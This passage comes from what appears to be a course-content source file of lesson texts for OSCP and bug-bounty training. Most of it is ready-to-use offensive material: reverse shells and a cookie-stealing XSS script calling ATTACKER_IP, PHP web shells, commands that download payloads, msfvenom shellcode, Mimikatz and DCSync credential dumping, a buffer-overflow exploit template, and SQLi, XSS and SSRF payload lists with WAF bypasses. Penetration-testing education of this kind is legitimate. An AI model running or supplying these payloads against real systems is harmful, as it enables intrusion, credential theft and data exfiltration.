| python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
\`\`\`

## File Upload Attacks
\`\`\`
# Extension bypass
shell.php    → blocked
shell.phtml  → try alternative extensions
shell.php5   → PHP5 extension
shell.php.jpg → double extension
shell.php%00.jpg → null byte (older systems)

# Content-Type bypass
Change Content-Type header to: image/jpeg

# Magic bytes bypass
Add GIF header: GIF89a<?php system($_GET['cmd']); ?>
Save as shell.php.gif
\`\`\`

## Web Shells
\`\`\`php
<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
\`\`\``,

  "oscp-xss-csrf": `## XSS & Client-Side Attacks (OSCP)

## XSS for Cookie Theft
\`\`\`html
<script>
  var i = new Image();
  i.src = "http://ATTACKER_IP/steal?c=" + document.cookie;
</script>
\`\`\`

## Hosting the Listener
\`\`\`bash
# Simple Python server to capture cookies
python3 -m http.server 80
# Watch for incoming requests with cookie data
\`\`\`

## CSRF Example
\`\`\`html
<!-- Force admin to change password -->
<img src="http://target/admin/change_password?new=hacked123" />

<!-- Or via hidden form auto-submit -->
<form action="http://target/admin/change_password" method="POST">
  <input type="hidden" name="new_password" value="hacked123">
</form>
<script>document.forms[0].submit();</script>
\`\`\`

## OSCP Context
- XSS may be needed to steal admin cookies for access
- CSRF could force actions through another user's session
- Check if HttpOnly flag is set on cookies (prevents JS access)
- Check for CSRF tokens in forms (if missing = vulnerable)`,

  "oscp-linux-initial": `## Linux Initial Access Techniques

## Common Entry Points
- **Web applications** — SQLi, file upload, command injection, LFI → RCE
- **Public exploits** — searchsploit for service versions found via Nmap
- **Default credentials** — admin/admin, root/toor, service-specific defaults
- **SSH keys** — Found via LFI, NFS shares, or web directories
- **Service-specific** — Tomcat (WAR deploy), Jenkins (script console), Redis (unauthenticated)

## Finding Public Exploits
\`\`\`bash
searchsploit apache 2.4.49         # Search by service + version
searchsploit -m 12345              # Copy exploit to current directory
searchsploit --nmap nmap_output.xml  # Parse nmap output
\`\`\`

## Getting a Shell
\`\`\`bash
# Listener on attacker
nc -lvnp 4444
# Or with rlwrap for readline support
rlwrap nc -lvnp 4444

# Reverse shells (on target)
bash -i >& /dev/tcp/ATTACKER/4444 0>&1
python3 -c 'import os,socket,pty;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
\`\`\`

## Shell Upgrade
\`\`\`bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
export TERM=xterm
\`\`\``,

  "oscp-linux-privesc": `## Linux Privilege Escalation (OSCP Focus)

## Enumeration Order
\`\`\`bash
# 1. Quick wins
sudo -l                              # What can we sudo?
find / -perm -4000 -type f 2>/dev/null  # SUID binaries

# 2. Automated scan
./linpeas.sh | tee linpeas_output.txt

# 3. Manual checks
cat /etc/crontab; ls -la /etc/cron.*  # Cron jobs
find / -writable -type f 2>/dev/null   # Writable files
getcap -r / 2>/dev/null                # Capabilities
cat /etc/passwd                        # Users with shell access
ls -la /home/*/                        # User home directories
\`\`\`

## Top Vectors (by frequency on OSCP)
1. **sudo -l** → Run allowed command via GTFOBins
2. **SUID binary** → GTFOBins or custom exploitation
3. **Cron job** → World-writable script running as root
4. **Password reuse** → Found creds → su root
5. **Writable /etc/passwd** → Add root-equivalent user
6. **Capabilities** → python3 with cap_setuid
7. **PATH hijacking** → SUID binary using relative path
8. **Kernel exploit** → Last resort (may crash machine)`,

  "oscp-linux-kernel": `## Kernel Exploits & Capabilities

## When to Use Kernel Exploits
- Last resort after exhausting other vectors
- Risk of crashing the target machine
- Always check the kernel version first

## Finding Kernel Exploits
\`\`\`bash
uname -a                            # Kernel version
cat /etc/os-release                  # OS version
searchsploit linux kernel $(uname -r | cut -d- -f1)
\`\`\`

## Notable Kernel Exploits
- **DirtyCow (CVE-2016-5195)** — Linux kernel < 4.8.3
- **DirtyPipe (CVE-2022-0847)** — Linux kernel 5.8-5.16.11
- **PwnKit (CVE-2021-4034)** — pkexec in Polkit

## Linux Capabilities
\`\`\`bash
# Find binaries with capabilities
getcap -r / 2>/dev/null

# Exploitable capabilities
python3 = cap_setuid   → python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
perl    = cap_setuid   → perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash"'
vim     = cap_setuid   → vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash","bash")'
\`\`\`

## Library Hijacking
\`\`\`bash
# If a SUID program loads a shared library you can replace
strace /usr/bin/suid_program 2>&1 | grep "open.*\\.so"
# If it loads from a writable path, create malicious .so
\`\`\``,

  "oscp-windows-initial": `## Windows Initial Access (OSCP)

## Common Entry Points
- **EternalBlue (MS17-010)** — SMBv1 on unpatched Windows 7/2008
- **Web applications on IIS** — ASP.NET vulnerabilities, file upload
- **WinRM (5985)** — With valid credentials (Evil-WinRM)
- **RDP (3389)** — With valid credentials (xfreerdp)
- **MSSQL (1433)** — With SA credentials, enable xp_cmdshell

## Connecting to Services
\`\`\`bash
# WinRM
evil-winrm -i $IP -u user -p password

# RDP
xfreerdp /u:user /p:password /v:$IP

# MSSQL
impacket-mssqlclient user:password@$IP
# Then: enable_xp_cmdshell; xp_cmdshell whoami

# SMB with credentials
impacket-psexec domain/user:password@$IP
impacket-wmiexec domain/user:password@$IP
\`\`\`

## Windows Reverse Shells
\`\`\`bash
# Generate with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER LPORT=4444 -f exe -o shell.exe

# PowerShell one-liner (from nishang)
powershell -e BASE64_ENCODED_PAYLOAD

# Transfer files
certutil -urlcache -split -f http://ATTACKER/shell.exe shell.exe
powershell iwr -uri http://ATTACKER/shell.exe -outfile shell.exe
\`\`\``,

  "oscp-windows-privesc": `## Windows Privilege Escalation (OSCP Focus)

## Enumeration
\`\`\`powershell
whoami /all                         # User + privileges + groups
systeminfo                          # OS version + patches
net user; net localgroup Administrators

# Automated
winpeas.exe
powershell -ep bypass -c "Import-Module .\\PowerUp.ps1; Invoke-AllChecks"
\`\`\`

## Top Vectors
1. **SeImpersonatePrivilege** → Potato attacks (see next lesson)
2. **Service misconfigurations** → Unquoted paths, weak permissions
3. **AlwaysInstallElevated** → Malicious MSI
4. **Stored credentials** → cmdkey /list → runas /savecred
5. **Scheduled tasks** → Writable scripts running as SYSTEM
6. **Password reuse** → Found creds from web apps, config files
7. **DLL hijacking** → Missing DLLs in writable locations

## Service Exploitation
\`\`\`powershell
# Unquoted service path
wmic service get name,pathname | findstr /i /v "C:\\Windows\\"

# Weak service permissions
sc qc ServiceName              # Query service config
accesschk.exe -ucqv ServiceName  # Check permissions

# If you can modify service binary path:
sc config ServiceName binpath="C:\\path\\shell.exe"
sc stop ServiceName; sc start ServiceName
\`\`\``,

  "oscp-potato-attacks": `## Potato Attacks & Token Impersonation

## When to Use
Check: \`whoami /priv\`
If **SeImpersonatePrivilege** is Enabled → Potato attack time!

Common accounts with this privilege:
- IIS Application Pool (iis apppool\\defaultapppool)
- MSSQL service account
- Any Windows service account

## PrintSpoofer (Simplest)
\`\`\`bash
# Download and run
PrintSpoofer.exe -i -c "cmd /c whoami"
PrintSpoofer.exe -i -c "C:\\path\\reverse_shell.exe"
# Works on Windows 10 / Server 2016+
\`\`\`

## JuicyPotato (Older Windows)
\`\`\`bash
JuicyPotato.exe -l 1337 -p C:\\path\\shell.exe -t * -c {CLSID}
# Works on Windows 7/8/Server 2008/2012
# May need specific CLSID for the OS version
\`\`\`

## GodPotato (Newer, Universal)
\`\`\`bash
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "C:\\path\\reverse_shell.exe"
# Works across multiple Windows versions
\`\`\`

## Important Notes
- Upload the potato binary to a writable directory (C:\\Temp, C:\\Users\\Public)
- Have your reverse shell ready before running
- If one potato fails, try another — compatibility varies by Windows version`,

  "oscp-ad-enum": `## AD Enumeration for OSCP

## Initial AD Enumeration
\`\`\`bash
# From Linux (with credentials)
crackmapexec smb DC_IP -u user -p pass --users    # List users
crackmapexec smb DC_IP -u user -p pass --groups   # List groups
crackmapexec smb DC_IP -u user -p pass --shares   # List shares

# BloodHound data collection
bloodhound-python -d domain.com -u user -p pass -ns DC_IP -c all

# ldapsearch
ldapsearch -x -H ldap://DC_IP -D "user@domain.com" -w "password" -b "dc=domain,dc=com" "(objectClass=user)" sAMAccountName
\`\`\`

## From Compromised Windows Host
\`\`\`powershell
# PowerView
Import-Module .\\PowerView.ps1
Get-DomainUser | Select samaccountname, description  # Check descriptions for passwords!
Get-DomainUser -SPN                                    # Kerberoastable
Get-DomainUser -PreauthNotRequired                     # AS-REP Roastable
Get-DomainGroup "Domain Admins" | Get-DomainGroupMember
Find-DomainShare -CheckShareAccess                     # Readable shares
\`\`\`

## BloodHound Analysis
After importing data, check these queries:
1. Shortest Path to Domain Admin
2. Kerberoastable Users with paths to DA
3. Users with DCSync rights
4. Dangerous ACL permissions (GenericAll, WriteDACL)`,

  "oscp-ad-kerberos": `## Kerberos Attacks for OSCP

## Kerberoasting
\`\`\`bash
# From Linux
impacket-GetUserSPNs domain.com/user:pass -dc-ip DC_IP -request -outputfile kerberoast.txt

# From Windows
Rubeus.exe kerberoast /outfile:kerberoast.txt

# Crack
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
\`\`\`

## AS-REP Roasting
\`\`\`bash
# From Linux
impacket-GetNPUsers domain.com/ -dc-ip DC_IP -usersfile users.txt -no-pass -outputfile asrep.txt

# Crack
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
\`\`\`

## OSCP AD Strategy
1. Enumerate users and look for Kerberoastable/AS-REP Roastable accounts
2. Crack hashes → try credentials on other services
3. Check for password reuse across machines
4. Look for GenericAll/WriteDACL permissions in BloodHound
5. Move laterally with discovered credentials
6. Aim for Domain Admin or DCSync rights`,

  "oscp-ad-lateral": `## Lateral Movement & Domain Compromise

## Moving Between Machines
\`\`\`bash
# With password
impacket-psexec domain.com/admin:pass@TARGET
evil-winrm -i TARGET -u admin -p pass
crackmapexec smb TARGET -u admin -p pass -x "whoami"

# With NTLM hash (Pass-the-Hash)
impacket-psexec domain.com/admin@TARGET -hashes :NTLM_HASH
evil-winrm -i TARGET -u admin -H NTLM_HASH
crackmapexec smb TARGET -u admin -H NTLM_HASH

# Check where admin creds work
crackmapexec smb SUBNET/24 -u admin -p pass
\`\`\`

## Extracting More Credentials
\`\`\`bash
# Mimikatz on compromised host
mimikatz# privilege::debug
mimikatz# sekurlsa::logonpasswords   # LSASS credentials
mimikatz# lsadump::sam               # Local SAM hashes

# Remote credential extraction
impacket-secretsdump domain.com/admin:pass@TARGET
# Returns: SAM hashes, cached creds, LSA secrets
\`\`\`

## Domain Compromise (DCSync)
\`\`\`bash
# If you have DCSync rights (Replicating Directory Changes)
impacket-secretsdump domain.com/admin:pass@DC_IP
# This dumps ALL domain hashes including KRBTGT

# With mimikatz
mimikatz# lsadump::dcsync /user:krbtgt /domain:domain.com
\`\`\``,

  "oscp-bof-fundamentals": `## OSCP Buffer Overflow Methodology

## Step-by-Step Process

### 1. Fuzzing
\`\`\`python
import socket

target = "10.10.10.5"
port = 9999
buffer = b"A" * 100

while True:
    try:
        s = socket.socket()
        s.connect((target, port))
        s.send(buffer)
        s.close()
        buffer += b"A" * 100
        print(f"Sent {len(buffer)} bytes")
    except:
        print(f"Crashed at {len(buffer)} bytes")
        break
\`\`\`

### 2. Find Exact Offset
\`\`\`bash
msf-pattern_create -l 3000    # Generate pattern
# Send pattern, note EIP value
msf-pattern_offset -l 3000 -q EIP_VALUE
\`\`\`

### 3. Verify EIP Control
Send: \`"A" * offset + "B" * 4\` → EIP should be 42424242

### 4. Find Bad Characters
Send all bytes (\\x01 to \\xff) after EIP, check in debugger for corruption.
Common bad chars: \\x00, \\x0a, \\x0d

### 5. Find JMP ESP
\`\`\`bash
# In Immunity Debugger with mona
!mona jmp -r esp -cpb "\\x00"
# Choose address from non-ASLR module
\`\`\`

### 6. Generate Shellcode
\`\`\`bash
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -b "\\x00" -f python EXITFUNC=thread
\`\`\`

### 7. Final Exploit
\`\`\`python
payload = b"A" * offset
payload += struct.pack("<I", JMP_ESP_ADDR)
payload += b"\\x90" * 16    # NOP sled
payload += shellcode
\`\`\``,

  "oscp-bof-practice": `## BOF Practice

## Practice Applications
- **VulnServer** — Multiple vulnerable commands for BOF practice
- **Buffer Overflow Prep (TryHackMe)** — 10 BOF exercises
- **Brainpan** — CTF-style BOF challenge on VulnHub

## Reusable Python Exploit Template
\`\`\`python
import socket
import struct

target = "10.10.10.5"
port = 9999
offset = 2003              # Found via pattern_offset
jmp_esp = 0x625011AF       # Found via mona
bad_chars = b"\\x00"        # Identified bad characters

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -b "\\x00" -f python
shellcode = b""
shellcode += b"\\xdb\\xce\\xd9\\x74..." # Your shellcode here

buffer = b"A" * offset
buffer += struct.pack("<I", jmp_esp)
buffer += b"\\x90" * 16
buffer += shellcode

s = socket.socket()
s.connect((target, port))
s.recv(1024)
s.send(buffer)
s.close()
\`\`\`

## Tips
- Always test your exploit skeleton step by step
- Verify each stage works before moving to the next
- Practice until the methodology is muscle memory
- Keep your template ready — BOF on OSCP is straightforward points`,

  "oscp-ssh-tunneling": `## SSH Tunneling & Port Forwarding

## Local Port Forwarding
Access a remote service through your local port.
\`\`\`bash
# Access target's port 3306 via your localhost:3306
ssh -L 3306:10.10.10.5:3306 user@pivot_host

# Access internal web server
ssh -L 8080:172.16.1.10:80 user@pivot_host
# Now browse http://localhost:8080
\`\`\`

## Remote Port Forwarding
Make your local port accessible from the target.
\`\`\`bash
# From compromised host: expose your attacker port 8000
ssh -R 8000:localhost:8000 attacker@ATTACKER_IP
\`\`\`

## Dynamic Port Forwarding (SOCKS Proxy)
\`\`\`bash
# Create SOCKS proxy through pivot host
ssh -D 9050 user@pivot_host

# Configure proxychains (/etc/proxychains4.conf)
socks5 127.0.0.1 9050

# Use with any tool
proxychains nmap -sT -Pn 172.16.1.0/24
proxychains curl http://172.16.1.10
\`\`\`

## Key Flags
\`\`\`
-L  Local port forward (access remote service locally)
-R  Remote port forward (expose local service remotely)
-D  Dynamic SOCKS proxy (tunnel all traffic)
-N  No shell (just forward ports)
-f  Background the SSH session
\`\`\``,

  "oscp-chisel-ligolo": `## Chisel & Ligolo-ng Pivoting

## Chisel Setup
\`\`\`bash
# On attacker (server mode)
./chisel server --reverse -p 8000

# On target (client) — SOCKS proxy
./chisel client ATTACKER_IP:8000 R:socks

# On target — specific port forward
./chisel client ATTACKER_IP:8000 R:3306:172.16.1.5:3306

# Then use proxychains with the SOCKS proxy (port 1080)
proxychains nmap -sT -Pn 172.16.1.0/24
\`\`\`

## Ligolo-ng (More Reliable)
\`\`\`bash
# On attacker (proxy)
./proxy -selfcert -laddr 0.0.0.0:11601

# On target (agent)
./agent -connect ATTACKER_IP:11601 -ignore-cert

# In proxy console
session                              # Select session
ifconfig                             # View target interfaces
start                                # Start tunnel
listener_add --addr 0.0.0.0:4444 --to 0.0.0.0:4444 --tcp  # Catch reverse shells through tunnel
\`\`\`

## When to Use What
- **SSH tunneling** — When you have SSH access
- **Chisel** — When you only have a shell (no SSH)
- **Ligolo-ng** — For complex multi-hop pivoting with many internal hosts`,

  "oscp-pg-practice": `## Proving Grounds Practice

## What is Proving Grounds?
OffSec's own practice platform — the CLOSEST to the actual OSCP exam experience.

## Tips
- Start with "Easy" rated machines and work up
- Follow the TJNull list of OSCP-like machines
- Practice the full workflow: enumerate → exploit → escalate → document
- Time yourself — aim to complete machines in 2-4 hours

## Approach Per Machine
\`\`\`
1. Full Nmap scan (TCP + top UDP ports)
2. Enumerate each service thoroughly
3. Research versions with searchsploit
4. Try the most likely attack vector
5. After initial access: run LinPEAS/WinPEAS
6. Escalate and capture proof
7. Document the full chain
\`\`\`

## Common Patterns on PG/OSCP
- Web app → file upload → reverse shell → cron job privesc
- Service exploit → low shell → SUID binary → root
- CMS vulnerability → admin access → code execution → kernel exploit
- Default creds → service access → config files → password reuse`,

  "oscp-htb-practice": `## HackTheBox OSCP-Like Machines

## Using HTB for OSCP Prep
- Focus on "Easy" and "Medium" rated machines
- Follow the TJNull OSCP-like list (community-curated)
- Watch IppSec walkthroughs AFTER attempting yourself
- Practice writing mini-reports for each machine

## Recommended Learning Path
1. **Starting Point** — Guided machines for absolute beginners
2. **Easy Boxes** — Build confidence with fundamental skills
3. **Medium Boxes** — OSCP-equivalent difficulty
4. **Active Directory** — Practice with HTB Pro Labs (Dante, Offshore)

## Study Methodology
- Attempt machine for 2-3 hours independently
- If stuck, read ONLY the next hint (not full walkthrough)
- After completing, watch IppSec's walkthrough for alternative methods
- Take notes on new techniques you learned

## Key Takeaways
- Don't skip enumeration — most machines are solved by thorough enumeration
- Learn from failures — every rabbit hole teaches you what NOT to do
- Practice writing findings as you go — builds report-writing muscle`,

  "oscp-mock-exam": `## Mock Exam Simulation

## Setting Up a Mock Exam
1. Select 3 standalone machines + 1 AD set from PG/HTB
2. Set a 24-hour timer
3. Prepare your note-taking template
4. Disconnect from walkthroughs and hints
5. Document everything as if it's the real exam

## Time Management Strategy
\`\`\`
Hours 0-1:   Scan ALL machines, let scans run in parallel
Hours 1-6:   AD set (40 points, highest priority)
Hours 6-12:  Standalone machines (easiest first)
Hours 12-18: Continue standalones, revisit stuck machines
Hours 18-24: Clean up notes, take missing screenshots
\`\`\`

## After the Mock Exam
- Write the full report (24-hour deadline, just like the real exam)
- Review what you could improve:
  - Were your notes detailed enough for the report?
  - Did you screenshot everything needed?
  - Where did you waste the most time?
  - What techniques do you need to practice more?

## Common OSCP Fails (Avoid These)
- Not enumerating thoroughly before exploiting
- Spending too long on one machine
- Not taking screenshots of proof hashes
- Submitting a report without step-by-step reproduction steps
- Using restricted tools (SQLMap, auto-exploit)
- Not upgrading your shell before running enumeration tools`,

  // ═══════════════════════════════════════════
  // BUG BOUNTY — Recon & Attack Surface Mapping
  // ═══════════════════════════════════════════

  "bb-subdomain-enum": `## Subdomain Enumeration

Subdomain enumeration is the foundation of bug bounty recon. Forgotten, staging, and dev subdomains often have weaker security controls.

## Passive Enumeration

Passive techniques don't touch the target directly:

- **Certificate Transparency**: Query crt.sh for all certificates issued for a domain
- **DNS Datasets**: Use SecurityTrails, VirusTotal, and Shodan for historical DNS records
- **Search Engines**: Google dorking with \`site:*.target.com\`

\`\`\`bash
# Subfinder — passive subdomain discovery
subfinder -d target.com -o subs.txt

# Amass passive mode
amass enum -passive -d target.com -o amass_subs.txt

# crt.sh via curl
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u
\`\`\`

## Active Enumeration

- **DNS Brute-forcing**: Try common subdomain wordlists against the target
- **Permutation scanning**: Generate subdomain permutations (dev, staging, test, api)
- **Zone transfers**: Attempt AXFR transfers (rarely work but always worth trying)

\`\`\`bash
# DNS brute force with puredns
puredns bruteforce wordlist.txt target.com -r resolvers.txt

# Permutation scanning with gotator
gotator -sub subs.txt -perm permutations.txt -depth 1 | puredns resolve
\`\`\`

## Consolidation

- Merge results from all tools
- Resolve all subdomains to check which are alive
- Use **httpx** to probe for live web servers
- Screenshot with **gowitness** or **aquatone** for visual review

\`\`\`bash
# Probe live hosts
cat all_subs.txt | httpx -status-code -title -tech-detect -o live.txt
\`\`\``,

  "bb-content-discovery": `## Content & Endpoint Discovery

Finding hidden endpoints, directories, and parameters is critical for discovering vulnerabilities that surface-level testing misses.

## Directory & File Fuzzing

\`\`\`bash
# ffuf — fast web fuzzer
ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -mc 200,301,302,403

# Recursive fuzzing
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2

# Extension fuzzing
ffuf -u https://target.com/FUZZ -w wordlist.txt -e .php,.bak,.old,.conf,.json,.xml
\`\`\`

## Parameter Discovery

- **Arjun**: Discovers hidden GET/POST parameters
- **ParamSpider**: Mines parameters from web archives
- **x8**: Finds hidden parameters in web applications

\`\`\`bash
# Arjun — parameter discovery
arjun -u https://target.com/endpoint

# ParamSpider — archive-based parameter mining
paramspider -d target.com
\`\`\`

## API Endpoint Discovery

- Check \`/api/\`, \`/v1/\`, \`/v2/\`, \`/graphql\`, \`/swagger.json\`, \`/openapi.json\`
- Look for API documentation: \`/docs\`, \`/redoc\`, \`/api-docs\`
- Use **gau** (GetAllURLs) to find historical endpoints

## JavaScript Analysis

- Extract endpoints from JavaScript files using **LinkFinder**
- Find hardcoded API keys, tokens, and secrets
- Map internal API routes from frontend code

\`\`\`bash
# LinkFinder — extract endpoints from JS
linkfinder -i https://target.com/app.js -o cli

# Extract JS files and analyze
gau target.com | grep "\\.js$" | httpx -status-code -content-length
\`\`\``,

  "bb-recon-automation": `## Recon Automation Pipelines

Manual recon doesn't scale. Build automated pipelines that run continuously against your targets.

## Pipeline Architecture

A typical recon pipeline:

1. **Subdomain enumeration** (subfinder, amass, crt.sh)
2. **DNS resolution** (puredns, massdns)
3. **HTTP probing** (httpx)
4. **Screenshotting** (gowitness)
5. **Technology detection** (httpx, wappalyzer)
6. **Vulnerability scanning** (nuclei)
7. **Notification** (notify)

\`\`\`bash
#!/bin/bash
# Simple recon pipeline
DOMAIN=$1
mkdir -p recon/$DOMAIN

# Step 1: Subdomain enum
subfinder -d $DOMAIN -silent | sort -u > recon/$DOMAIN/subs.txt

# Step 2: Resolve & probe
cat recon/$DOMAIN/subs.txt | httpx -silent -status-code -title > recon/$DOMAIN/live.txt

# Step 3: Nuclei scan
cat recon/$DOMAIN/live.txt | awk '{print $1}' | nuclei -t cves/ -t exposures/ -o recon/$DOMAIN/vulns.txt

# Step 4: Notify on findings
cat recon/$DOMAIN/vulns.txt | notify -provider-config notify-config.yaml
\`\`\`

## Continuous Monitoring

- Run pipelines on a schedule (cron or GitHub Actions)
- Diff results against previous runs to detect changes
- Alert on new subdomains, open ports, or technology changes
- Use **notify** to push results to Slack, Discord, or Telegram

## Key Tools

- **Axiom**: Distribute scanning across cloud instances
- **ReconFTW**: All-in-one recon framework
- **Osmedeus**: Automated recon workflow engine`,

  "bb-scope-analysis": `## Scope Analysis & Target Selection

Choosing the right bug bounty program and targets maximizes your chances of finding valid, rewarded bugs.

## Reading Program Scope

- **In-scope**: Domains, apps, APIs explicitly listed
- **Out-of-scope**: Assets, vulnerability types, and testing methods excluded
- **Safe harbor**: Legal protections for good-faith testing
- **Reward table**: Severity-to-payout mapping (P1–P4)

## Program Selection Strategy

- **New programs**: Less competition, more low-hanging fruit
- **Programs with wide scope**: More attack surface = more bugs
- **VDP (Vulnerability Disclosure Programs)**: No bounty but good for reputation
- **Private programs**: Invitation-only, less competition, often better payouts

## Target Prioritization

- **Acquisitions**: Recently acquired companies often have inconsistent security
- **New features**: Fresh code = fresh bugs
- **Mobile apps**: Often less tested than web
- **APIs**: Business logic and authorization flaws are common
- **Legacy systems**: Older tech stacks with known vulnerabilities

## Time Management

- Set time limits per target (2-4 hours initial assessment)
- Track which targets and vulnerability types yield results
- Maintain a personal target database with notes`,

  "bb-fingerprinting": `## Technology Fingerprinting

Identifying the technology stack helps tailor your attack approach and find stack-specific vulnerabilities.

## Techniques

- **HTTP Headers**: Server, X-Powered-By, X-AspNet-Version reveal frameworks
- **HTML Source**: Meta generators, CSS/JS framework signatures, comments
- **Cookies**: Session cookie names indicate frameworks (PHPSESSID, JSESSIONID, connect.sid)
- **Error Pages**: Default error pages reveal server/framework versions

\`\`\`bash
# httpx technology detection
echo "target.com" | httpx -tech-detect -status-code -title

# Wappalyzer CLI
wappalyzer https://target.com

# whatweb — detailed fingerprinting
whatweb -a 3 https://target.com
\`\`\`

## WAF Detection

\`\`\`bash
# wafw00f — WAF detection
wafw00f https://target.com

# Manual WAF detection: trigger a simple XSS payload
curl "https://target.com/?q=<script>alert(1)</script>" -v
# Check for: 403 responses, custom error pages, challenge pages
\`\`\`

## CDN & Hosting

- **CDN**: Cloudflare, Akamai, Fastly — identify to find origin IPs
- **Hosting**: AWS, GCP, Azure — check for cloud misconfigurations
- **Origin IP discovery**: Historical DNS records, email headers, direct IP scanning`,

  // ═══════════════════════════════════════════
  // BUG BOUNTY — Web Vulnerability Discovery
  // ═══════════════════════════════════════════

  "bb-xss-hunting": `## XSS Hunting Techniques

Cross-Site Scripting remains one of the most common and rewarded bug bounty findings.

## Types of XSS

- **Reflected**: Payload in URL/request, reflected in response
- **Stored**: Payload saved server-side, executed for all visitors
- **DOM-based**: Payload manipulates client-side JavaScript without touching the server

## Finding XSS

1. **Identify reflection points**: Search for input reflected in HTML
2. **Determine context**: HTML body, attribute, JavaScript, URL
3. **Craft context-appropriate payload**: Break out of current context
4. **Bypass filters/WAF**: Encoding, alternative tags, event handlers

\`\`\`text
# HTML body context
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<details open ontoggle=alert(1)>

# Attribute context (break out with ")
" onfocus=alert(1) autofocus="
" onmouseover=alert(1) "

# JavaScript context
';alert(1)//
\\';alert(1)//

# WAF bypass techniques
<svg/onload=alert(1)>
<img src=x oNeRrOr=alert(1)>
<iframe srcdoc="<script>alert(1)</script>">
\`\`\`

## DOM XSS Sources & Sinks

- **Sources**: location.hash, location.search, document.referrer, postMessage
- **Sinks**: innerHTML, document.write, eval, setTimeout, jQuery.html()

## Escalating XSS Impact

- Steal cookies/session tokens (if no HttpOnly)
- Capture keystrokes and form data
- Perform actions as the victim (account takeover)
- Redirect to phishing pages`,

  "bb-ssrf": `## SSRF & Cloud Metadata Attacks

Server-Side Request Forgery tricks the server into making requests to unintended destinations.

## Common SSRF Vectors

- URL parameters: \`?url=\`, \`?redirect=\`, \`?image=\`, \`?file=\`
- Webhook URLs, PDF generators, image fetchers
- File imports (XML, SVG with external references)
- API integrations and proxy endpoints

\`\`\`text
# Basic SSRF test
?url=http://127.0.0.1
?url=http://localhost:80
?url=http://[::1]

# Cloud metadata endpoints
?url=http://169.254.169.254/latest/meta-data/ (AWS)
?url=http://metadata.google.internal/ (GCP)
?url=http://169.254.169.254/metadata/instance (Azure)

# Bypass filters
?url=http://0x7f000001 (hex IP)
?url=http://0177.0.0.1 (octal IP)
?url=http://2130706433 (decimal IP)
?url=http://localtest.me (DNS rebinding)
\`\`\`

## Cloud Metadata Exploitation (AWS)

\`\`\`bash
# IMDSv1 — direct access
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# This returns temporary AWS credentials (AccessKeyId, SecretAccessKey, Token)
# Use them with AWS CLI to access S3, EC2, Secrets Manager
\`\`\`

## Blind SSRF Confirmation

- Use **Burp Collaborator** or **interact.sh** for out-of-band detection
- Time-based: compare response times for internal vs external URLs
- Error-based: different error messages for open vs closed ports`,

  "bb-idor": `## IDOR & Broken Access Control

Insecure Direct Object References are among the highest-impact and most common bug bounty findings.

## What is IDOR?

IDOR occurs when an application exposes internal references (IDs, filenames) without verifying the user's authorization to access them.

## Testing Methodology

1. **Create two accounts** (or use one account + unauthenticated)
2. **Map all endpoints** that reference user-specific data
3. **Swap identifiers**: Change user IDs, order IDs, file names
4. **Test HTTP methods**: If GET works, try PUT, DELETE, PATCH
5. **Check for mass assignment**: Send extra parameters in POST/PUT

\`\`\`text
# Common IDOR patterns
GET /api/users/123/profile → Change to /api/users/124/profile
GET /api/orders/ORD-001 → Change to /api/orders/ORD-002
GET /download?file=user_123_report.pdf → Change to user_124_report.pdf
DELETE /api/comments/456 → Delete another user's comment
\`\`\`

## ID Types and Bypass Techniques

- **Sequential integers**: Easily enumerable (1, 2, 3...)
- **UUIDs**: Harder but check if leaked in responses, JS files, or emails
- **Encoded IDs**: Base64 decode, modify, re-encode
- **Hashed IDs**: Check for predictable hashing (MD5 of sequential numbers)

## Escalation

- Read access → information disclosure
- Write access → data modification
- Delete access → data destruction
- Admin endpoint access → privilege escalation`,

  "bb-sqli-advanced": `## Advanced SQL Injection

Beyond basic SQLi — techniques for modern applications with WAFs and prepared statements.

## Blind SQL Injection

When the application doesn't show SQL output directly:

\`\`\`text
# Boolean-based blind
' AND 1=1-- (true → normal response)
' AND 1=2-- (false → different response)

# Time-based blind
' AND SLEEP(5)-- (MySQL)
'; WAITFOR DELAY '0:0:5'-- (MSSQL)
' AND pg_sleep(5)-- (PostgreSQL)

# Extract data character by character
' AND SUBSTRING(@@version,1,1)='5'--
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>96--
\`\`\`

## Second-Order SQL Injection

- Payload is stored safely (parameterized insert)
- Later retrieved and used in another query without sanitization
- Common in: profile names used in admin queries, usernames in logs

## WAF Bypass Techniques

\`\`\`text
# Case variation
UnIoN SeLeCt

# Comments as whitespace
UN/**/ION/**/SE/**/LECT

# URL encoding
%55%4e%49%4f%4e%20%53%45%4c%45%43%54

# Alternative syntax
1 UNION ALL SELECT
1 /*!UNION*/ /*!SELECT*/
\`\`\`

## Out-of-Band SQLi

- DNS exfiltration: \`LOAD_FILE(CONCAT('\\\\\\\\',@@version,'.attacker.com\\\\a'))\`
- HTTP requests: \`UTL_HTTP.REQUEST\` (Oracle)
- Use Burp Collaborator to receive exfiltrated data`,

  "bb-business-logic": `## Business Logic Vulnerabilities

Logic flaws can't be found by scanners — they require understanding the application's intended behavior.

## Common Logic Flaws

- **Race conditions**: Simultaneously redeeming a discount code multiple times
